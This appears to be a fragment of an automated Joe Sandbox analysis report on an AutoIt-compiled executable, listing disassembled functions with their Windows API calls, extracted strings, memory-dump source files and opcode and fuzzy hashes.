                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: e7e6a49594ec6b22b358da7a34f815aa76eea3e3e890b99bd2d133ed46e2b5bc
                                                                                                                                • Instruction ID: 12b8f14a1919a4b4fb8036370c3abae1c263c46159d37f56d3815201fd8e1d5b
                                                                                                                                • Opcode Fuzzy Hash: e7e6a49594ec6b22b358da7a34f815aa76eea3e3e890b99bd2d133ed46e2b5bc
                                                                                                                                • Instruction Fuzzy Hash: CDA0243000050CF7CF001F71FC04C447F5CD7041517004011F40C00031C733541055C1
                                                                                                                                Function 00F3A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetProcessHeap.KERNEL32(00F36AE9,00FC67D8,00000014), ref: 00F3A937
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HeapProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 54951025-0
                                                                                                                                • Opcode ID: 0c308c8aae4cf66fda9843a89a987f771bc6aa5ebc6b0c331ccbab36a67efc96
                                                                                                                                • Instruction ID: cc5bff69f7d1c1e87a0ea24412316076256b267c1043dbd23426cfc973a7c8fc
                                                                                                                                • Opcode Fuzzy Hash: 0c308c8aae4cf66fda9843a89a987f771bc6aa5ebc6b0c331ccbab36a67efc96
                                                                                                                                • Instruction Fuzzy Hash: AEB012B17031064BE7084B38AC6421A3AD55749101351403F7003C2660DF308450FF00
                                                                                                                                Function 00F30EC4 Relevance: .3, Instructions: 345COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                • Instruction ID: 79c4e7307b125c05e99824fb76398f6528b8518bfdc3eccdbee805b29a44857c
                                                                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                • Instruction Fuzzy Hash: 11C1C8726051A349DF2D463AC43493FFFA16EA27B271A076ED4B3CB5C4EE24C564E620
                                                                                                                                Function 00F312F9 Relevance: .3, Instructions: 341COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                • Instruction ID: 567ccb4c32dd2b423b1f9e649f4b6af63f9ebf90c4c86a3ead00cad7a48e1911
                                                                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                • Instruction Fuzzy Hash: 5BC1D7726051A34ADF6D4639C43453FBEA16AA27B271E076ED4B3CB5C4EF24C524E620
                                                                                                                                Function 00F30A8F Relevance: .3, Instructions: 331COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                • Instruction ID: 9ee3309bb3858213f095324e21e1d77293aaa41a68792d37ce4b297b555755a6
                                                                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                • Instruction Fuzzy Hash: 75C1C6726051A349DF2D4639D43493FFFA15AA27B6B1A076FD4B3CB4C0EE28C564E620
                                                                                                                                Function 00F30677 Relevance: .3, Instructions: 323COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                • Instruction ID: 6b1b933d46a42dcdb1b7836e081f8d72d063b3fa317799cf3553ef752ceec526
                                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                • Instruction Fuzzy Hash: 3BC1E3726051A34ADF2D4639D43493FBFA15EA27B270A076FD4B3CB5C5EE28C524E620
                                                                                                                                Function 00F6A750 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 490commemoryfileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F6A7A5
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F6A7B7
                                                                                                                                • DestroyWindow.USER32 ref: 00F6A7C5
                                                                                                                                • GetDesktopWindow.USER32 ref: 00F6A7DF
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00F6A7E6
                                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F6A927
                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F6A937
                                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6A97F
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00F6A98B
                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F6A9C5
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6A9FA
                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6AA05
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00F6AA0E
                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6AA1D
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00F6AA26
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6AA2D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00F6AA38
                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00F6AA4A
                                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F9D9BC,00000000), ref: 00F6AA60
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00F6AA70
                                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F6AA96
                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F6AAB5
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6AAD7
                                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F6ACC4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Global$Rect$Create$DeleteFileFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                • API String ID: 2148010464-2373415609
                                                                                                                                • Opcode ID: d220274ae0f316ed09ba3a7f83933a3d8964bbb7601fa3a361572aaa6fe61980
                                                                                                                                • Instruction ID: b8fa2c9419f88b0f047a628225e269cb41d57a1835f56b1fd14568213f978e29
                                                                                                                                • Opcode Fuzzy Hash: d220274ae0f316ed09ba3a7f83933a3d8964bbb7601fa3a361572aaa6fe61980
                                                                                                                                • Instruction Fuzzy Hash: 93028D71900209EFDB14DFA8DD89EAE7BB9FB49310F108159F915AB2A0CB349D41EF60
                                                                                                                                Function 00F7D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00F7D0EB
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00F7D11C
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00F7D128
                                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 00F7D142
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00F7D151
                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00F7D17C
                                                                                                                                • GetSysColor.USER32(00000010), ref: 00F7D184
                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00F7D18B
                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 00F7D19A
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00F7D1A1
                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00F7D1EC
                                                                                                                                • FillRect.USER32(?,?,00000000), ref: 00F7D21E
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F7D249
                                                                                                                                  • Part of subcall function 00F7D385: GetSysColor.USER32(00000012), ref: 00F7D3BE
                                                                                                                                  • Part of subcall function 00F7D385: SetTextColor.GDI32(?,?), ref: 00F7D3C2
                                                                                                                                  • Part of subcall function 00F7D385: GetSysColorBrush.USER32(0000000F), ref: 00F7D3D8
                                                                                                                                  • Part of subcall function 00F7D385: GetSysColor.USER32(0000000F), ref: 00F7D3E3
                                                                                                                                  • Part of subcall function 00F7D385: GetSysColor.USER32(00000011), ref: 00F7D400
                                                                                                                                  • Part of subcall function 00F7D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F7D40E
                                                                                                                                  • Part of subcall function 00F7D385: SelectObject.GDI32(?,00000000), ref: 00F7D41F
                                                                                                                                  • Part of subcall function 00F7D385: SetBkColor.GDI32(?,00000000), ref: 00F7D428
                                                                                                                                  • Part of subcall function 00F7D385: SelectObject.GDI32(?,?), ref: 00F7D435
                                                                                                                                  • Part of subcall function 00F7D385: InflateRect.USER32(?,000000FF,000000FF), ref: 00F7D454
                                                                                                                                  • Part of subcall function 00F7D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F7D46B
                                                                                                                                  • Part of subcall function 00F7D385: GetWindowLongW.USER32(00000000,000000F0), ref: 00F7D480
                                                                                                                                  • Part of subcall function 00F7D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F7D4A8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3521893082-0
                                                                                                                                • Opcode ID: 63b0f160398f3743feb565f724249b28a63cc464bb85fd885d016ee529a6aa7e
                                                                                                                                • Instruction ID: 6df431fa30c8cc45f4457ee6f8acf49864ecb8f4082cf91c3e86c7bbc2bd0f0b
                                                                                                                                • Opcode Fuzzy Hash: 63b0f160398f3743feb565f724249b28a63cc464bb85fd885d016ee529a6aa7e
                                                                                                                                • Instruction Fuzzy Hash: FB919D72408305AFDB109F64DC08E6BBBB9FF89320F604A1AF966961E0D771D944EF52
                                                                                                                                Function 00F6A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00F6A42A
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F6A4E9
                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F6A527
                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F6A539
                                                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F6A57F
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00F6A58B
                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F6A5CF
                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F6A5DE
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00F6A5EE
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00F6A5F2
                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F6A602
                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F6A60B
                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00F6A614
                                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F6A642
                                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F6A659
                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F6A694
                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F6A6A8
                                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F6A6B9
                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F6A6E9
                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00F6A6F4
                                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F6A6FF
                                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F6A709
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                • Opcode ID: c9477f67a864a0d4e0070fcef207f784cd96d5bfe71731a7b71abaefca5244ac
                                                                                                                                • Instruction ID: 3877ba2a9800ef32f556c18cafdab5eb2e7e118ec7e2342944bd0d0ffb68f72b
                                                                                                                                • Opcode Fuzzy Hash: c9477f67a864a0d4e0070fcef207f784cd96d5bfe71731a7b71abaefca5244ac
                                                                                                                                • Instruction Fuzzy Hash: A5A19D71A00209BFEB14DBA4DD4AFAE7BB9EB44710F108115F615A72E1DBB0AD40EF60
                                                                                                                                Function 00F5E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00F5E45E
                                                                                                                                • GetDriveTypeW.KERNEL32(?,00FADC88,?,\\.\,00FADBF0), ref: 00F5E54B
                                                                                                                                • SetErrorMode.KERNEL32(00000000,00FADC88,?,\\.\,00FADBF0), ref: 00F5E6B1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                                • Opcode ID: e3bef546e570d5d015ff398889a7b50d38db47715f8d086162b55c57502d0fad
                                                                                                                                • Instruction ID: da777ce574c26b1459d4ce9004d8fe536cdd5615795073517e8a64d9046844e6
                                                                                                                                • Opcode Fuzzy Hash: e3bef546e570d5d015ff398889a7b50d38db47715f8d086162b55c57502d0fad
                                                                                                                                • Instruction Fuzzy Hash: BE5105312183029BC208EF14CD92E6DB7E1AB947D6F26891DFA02E7191D720DF49F643
                                                                                                                                Function 00F1C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                                • Opcode ID: bfb015a2a1ced81527f8be318b69a8440bb9575bb91e71d24f193177ab580e8f
                                                                                                                                • Instruction ID: ec4947f8cd1cc8f1d47e0bc2d01e6c932b3bb774d443b534a6ac4539ef997d07
                                                                                                                                • Opcode Fuzzy Hash: bfb015a2a1ced81527f8be318b69a8440bb9575bb91e71d24f193177ab580e8f
                                                                                                                                • Instruction Fuzzy Hash: 39610C71680311B7D725FA64DC82FFE3358AF16760F140025F952A61C3EBA4DA81F6E1
                                                                                                                                Function 00F148C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32 ref: 00F14956
